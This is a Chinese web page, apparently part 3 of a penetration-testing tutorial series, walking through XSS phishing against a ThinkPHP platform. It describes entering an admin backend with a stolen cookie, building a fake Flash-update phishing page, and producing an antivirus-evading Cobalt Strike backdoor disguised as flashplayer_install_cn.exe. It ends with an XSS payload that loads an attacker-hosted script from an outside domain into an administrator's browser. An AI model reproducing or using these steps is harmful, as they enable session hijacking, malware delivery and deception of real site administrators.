主页 > 网络知识 > 渗透测试之地基钓鱼篇:thinkphp平台XSS钓鱼(3)

渗透测试之地基钓鱼篇:thinkphp平台XSS钓鱼(3)

 

1608214338_5fdb6742ea40ef9d60f04.png!small?1608214339487

 

send执行后,通过cookie进入到了管理员后台!

 

1608214354_5fdb6752f01bdc5bd7921.png!small?1608214355294

 

 

1608214363_5fdb675b3fde5b7a7de47.png!small?1608214363587

 

复制URL!

 

1608214378_5fdb676aa71ab38bff4b6.png!small?1608214380258

 

浏览器中访问后,正常进入管理员后台!

四、利用XSS钓鱼 1、搭建Flash钓鱼页面

 

1608214402_5fdb67827f33b6e46e921.png!small?1608214404592

 

在公网服务器搭建钓鱼页面,任何能访问互联网客户都可以访问该页面!

2、生成免杀后门

 

1608214425_5fdb679944c1cbdcf1990.png!small?1608214425686

 

利用Cobal Strike生成C#语言的shell...

 

1608214440_5fdb67a83fa3d223746bf.png!small?1608214441252

 

利用该shell进行混淆,并利用python的tinyaes模块混淆也行,在来个分离免杀,最后利用pyinstaller生成exe外壳...必过全国杀毒软件!(不演示过程)
将flash修改名字为:flashplayer_install_cn.exe(或者修改为update等吸引人下载的名称都行)

3、修改Flash源码

 

1608214481_5fdb67d1a09fc866db39f.png!small?1608214481889

 

这是Flash贷款平台源码文件目录!!

 

1608214525_5fdb67fd1571b4f7c7d08.png!small?1608214526243

 

修改index.html代码,找到其中href="进行修改为:flashplayer_install_cn.exe 意思就是点击页面立即下载就能自动下载目录下的exe后门文件!

 

1608214537_5fdb6809b1ebc5efc8559.png!small?1608214538266

 

在准备个js文件,意思是执行该js后,会在页面提示:

您的 FLASH 版本过低,尝试升级后访问该页面!

并访问到该页面:

 

1608214621_5fdb685dca63cacb915c0.png!small?1608214622396

 

将exe和js都上传到功能网服务器apache底层!
测试访问可看到正常读取,确保内网管理员能执行XSS后访问到js文件,这里就可以开始了!

4、利用XSS漏洞植入JS

 

1608214651_5fdb687bbb8a4253790ab.png!small?1608214652230

 

可看到利用(三)中XSS利用的方法,执行插入:

"><sCRiPt sRC=http://flash.dayuixiyou.cn/flash-test.js></sCrIpT><"
#需要前后加入闭合 "> <"

 

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!